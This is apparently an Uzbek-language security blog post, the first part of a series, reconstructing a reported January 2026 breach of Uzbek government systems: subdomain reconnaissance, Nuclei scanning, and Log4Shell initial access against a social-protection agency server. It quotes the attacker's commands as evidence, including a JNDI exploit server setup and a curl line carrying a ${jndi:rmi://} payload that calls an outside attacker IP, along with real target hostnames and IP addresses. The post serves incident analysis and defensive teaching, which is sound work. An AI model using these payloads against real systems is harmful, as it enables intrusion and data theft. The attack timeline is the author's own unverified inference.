KIRISH

2026 yil 4-fevralda Reddit platformasida O’zbekiston Respublikasi davlat axborot tizimlariga nisbatan kiberxujum amalga oshirilgani haqida ma’lumotlar paydo bo’ldi. Noma’lum shaxs tomonidan e’lon qilingan dalillarga ko’ra, 29-yanvardan boshlab bir nechta davlat tizimlari buzilgan va millionlab fuqarolarning shaxsiy ma’lumotlari xavf ostiga tushgan.Blogimiz faoliyati ham aynan kiberxavfsizlik yo’nalishida ekanligini hisobga olib ushbu hujumga o’z munosabatimni bildirishga qaror qildim.

Muhim ogohlantirish:

Ushbu maqola muallif tomonidan ochiq manbalardan (darknet publikatsiyalari, screenshot’lar, sample ma’lumotlar) olingan dalillarni mustaqil tahlil qilish natijasida yozilgan. Barcha xulosalar shaxsiy tadqiqot va texnik tahlil asosida chiqarilgan bo’lib, rasmiy tekshiruv natijalarini aks ettirmaydi.

Eslatma:

Bu akademik-texnik tahlil bo’lib, kiberxavfsizlik sohasida bilim almashish maqsadida tayyorlangan

Taqdim etilgan ssenariy taxminiy bo’lib, haqiqiy voqealar ketma-ketligidan farq qilishi mumkin

Maqolada keltirilgan dalillarning haqiqiyligi mustaqil tasdiqlanmagan

Sample ma’lumotlardagi shaxsiy ma’lumotlar va maxfiy detallar maqolada ko’rsatilmagan

Maqsad: Xavfsizlik zaifliklarini aniqlash, shunga o’xshash xujumlarning oldini olish bo’yicha tavsiyalar berish va kiberxavfsizlik sohasi mutaxassislari uchun o’quv materiali yaratish.

Maqolada hujumning texnik tahlili, taxminiy attack timeline va ishlatilgan metodlar dalillar asosida batafsil yoritiladi. Tahlil davomida screenshot’lar, xaker eslatmalari (RECON fayl) va texnik vositalar dalil sifatida keltiriladi.

1.1 Ta’sirlangan Tizimlar

EGOV (sso.egov.uz)
IHMA (Ijtimoiy Himoya Milliy Agentligi)
Ichki Ishlar Vazirligi (IIV)
UZMRC(O’zbekiston Ipoteka qayta moliyalashtirish kompaniyasi)
Boshqa tizimlar

2. HUJUM BOSQICHLARI

2.1 QADAM : Passive Reconnaissance (Passiv Razvedka)

Taxminiy vaqt: Yanvar 2026 boshi

Nima qilindi?

Xaker hali hech qaysi serverga hujum qilmagan vaziyat. U faqat ochiq manbalardan .uz domenlari haqida ma’lumot yig’gan.Asosiy davlat organlari domenlarini aynan ushbu bosqichda to’plagan. Xaker e’lon qilgan SUBDOMAINS nomli faylni o’rganib chiqib quyidagi ma’lumotlarni aniqladim.

Ushbu faylda asosan 10 ta asosiy domenning subdomenlari tekshirilgan

#DomenSubdomenlar soniTavsif
1soliq.uz~150+Soliq qo’mitasi
2edu.uz~340+Ta’lim vazirligi tizimi
3mehnat.uz~90+Mehnat vazirligi
4davxizmat.uz~60+Davlat xizmatlari markazi
5adm.uz~110+ADM Group (xususiy kompaniya)
6csec.uz~25+Kiberxavfsizlik markazi
7digital.uz~30+Raqamli texnologiyalar vazirligi
8bkm.uz~30BKM (xususiy sektor)
9sbtsue.uz~100+TDIU Samarqand filiali
10meningfikrim.uz~5Mening fikrim portali

Keltirilgan domenlarning deyarli barchasi (90%+) davlat sektoriga tegishli.

Xaker avval asosiy davlat domenlarini aniqlagan (Google, research), keyin har bir domen uchun subfinder(yoki boshqa alternativ) ishlatgan va natijalarni bitta fayl qilib birlashtirgan:

subfinder -d soliq.uz -o soliq_subs.txt
subfinder -d edu.uz -o edu_subs.txt
...

Sodda qilib aytganda xaker xuddi telefon daftarini varaqlagandek — barcha davlat saytlarining manzillarini yig’di. Hali hech qaysi saytga «tegmagan», faqat ro’yxat tuzgan.

Natijada: Xaker 1,863 ta subdomain to’plagan, jumladan:

DomenTashkilot
ihma.uz (report-tiek.ihma.uz)Ijtimoiy Himoya Milliy Agentligi
hisobot.stat.uzStatistika qo’mitasi
dev-my3.soliq.uzSoliq qo’mitasi
mail.edu.uzTa’lim vazirligi
auth.mehnat.uzMehnat vazirligi

Muhim topilmalar — xakerning ko’zi bilan qaraganda qiziqarli subdomenlar aniqlangan:

TuriMisollarXavf darajasi
Admin panellaradmin., panel., cpanel.🔴 Yuqori
Test muhitlaritest., dev., beta.🔴 Yuqori
VPN serverlarvpn., vpn2., vpn3.🔴 Yuqori
API endpointsapi., -api.🟡 O’rta

2.2 QADAM Active Reconnaissance (Zaiflik qidirish)

Taxminiy vaqt: Yanvar 2026 o’rtalari

Nima qilindi?

Topilgan 1,863 ta subdomainga avtomatik zaiflik skanerlash o’tkazildi. Xaker har bir saytni ma’lum zaifliklar ro’yxati (CVE’lar) bilan solishtirdi.

Ishlatilgan vositalar

DALIL: RECON fayldan — Nuclei scanner ishlatilgan

./nuclei -t nuclei-templates-10.3.8/ -duc -rl 5

💡 Nuclei — bu avtomatik zaiflik scanner. U har bir saytni «Bu saytda Log4Shell bormi? SQL injection bormi?» kabi savollar bilan tekshiradi.

Xaker barcha subdomenlarni skanerlab, zaifliklarni qidirgan:

Natija

report-tiek.ihma.uz subdomenida Log4Shell (CVE-2021-44228) zaiflik topilgan!

Buni xaker tarqatgan LOG4SHELL screenshot ham tasdiqlaydi.

ParametrQiymat
ZaiflikLog4Shell (CVE-2021-44228)
Xavf darajasi10/10 — Kritik
Targetreport-tiek.ihma.uz
Zaiflik turiRemote Code Execution (RCE)
Qachon topilgan2021 yil dekabr — 4 yildan beri ma’lum!

Sodda tilda tushuntirsam: Xaker 1,863 ta eshikni taqillatib ko’rdi. Ko’pchiligi yopiq edi, lekin report-tiek.ihma.uz eshigida singan qulf topdi — Log4Shell zaiflik

🚨 Bu juda muhim nuqta chunki mening taxminim buyicha xaker davlat tizimlariga aynan shu yerdan kirgan.Bu nimani anglatadi? EGOV (sso.egov.uz) yoki IIV tizimi kirish nuqtasi bo’lmagan yani xakerda ushbu tizimlarni buzish uchun aniq bir ishlaydigan exploiti mavjud bo’lmagan

2.3 QADAM Initial Access — Log4Shell Exploit

Aniq vaqt: 29 Yanvar 2026, 13:07:25 GMT (Toshkent vaqti: 18:07-18:09 (kechqurun))

DALIL: LOG4SHELL screenshot — hujum vaqti

2026-01-29 13:09:15 [RMISERVER] >> Have connection from /93.188.84.58:33401

Log4Shell qanday ishlaydi?

Log4j — Java dasturlarda ishlatiladigan logging kutubxonasi. Zaiflik shundaki, maxsus matn yuborilsa, server xakerning kodini avtomatik ishga tushiradi.

Hujum jarayoni

1-bosqich: Xaker o’z serverini tayyorladi (OVH, Fransiya):

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 51.178.174.66

2-bosqich: Zararli so’rov yubordi:

DALIL: LOG4SHELL screenshot — trigger buyrug’i

curl -k -H ‘Accept: ${jndi:rmi://51.178.174.66:1099/zh2ekn}’ https://report-tiek.ihma.uz/

3-bosqich: Xaker serverga ulandi:

DALIL: LOG4SHELL screenshot — ulanish loglari

2026-01-29 13:09:15 [RMISERVER] >> Have connection from /93.188.84.58:33401
2026-01-29 13:09:42 [RMISERVER] >> Have connection from /93.188.84.58:33402
2026-01-29 13:09:43 [RMISERVER] >> Have connection from /93.188.84.58:33403

Natija

ParametrQiymat
Targetreport-tiek.ihma.uz
TashkilotIHMA (Ijtimoiy Himoya Milliy Agentligi)
Xaker serveri51.178.174.66 (OVH, Fransiya)
Qurbon server IP93.188.84.58
Vaqt29 Yanvar 2026, 13:07-13:09 GMT

**MUHIM:**

Taxminimcha IHMA serveri UZMRC network bilan bog’langan (RECON faylda bir xil bo’limda mention qilingan), bu xakerga bir serverdan ikkinchisiga lateral movement imkonini bergan.

Hulosa: Asosiy Sabab: Patch qilinmagan

Log4j **Zaiflik:** CVE-2021-44228 (Log4Shell)

**Topilgan:** 2021 yil dekabr

**Hujum:** 2026 yil yanvar

⚠️ Bu degani: IHMA 4+ yil davomida critical zaiflikni patch qilmagan!

Bu maqolaning **BIRINCHI QISMI** bo’lib, faqat initial access bosqichini qamrab oldi.

**Keyingi qismlarda:**

— Lateral Movement — IHMA’dan boshqa tizimlarga o’tish

— EGOV OAuth compromise — qanday CLIENT_SECRET olingan

— IIV, UZMRC, Statistika — boshqa tizimlarni buzish

— Sliver C2 Botnet — 20-30 ta serverga backdoor

— Data Exfiltration — ma’lumotlarni o’g’irlash — Timeline va to’liq attack chain

**2-QISM tez orada chiqadi!**

CWGSecurity sizni eng yangi tahdidlar va kiberxavfsizlik yangiliklari bilan muntazam xabardor qilib boradi. Yana ko‘proq bunday tahlillar va foydali maslahatlar uchun Telegram kanalimizga qo‘shiling@cwgsecurity

Categorized in:

Tagged in: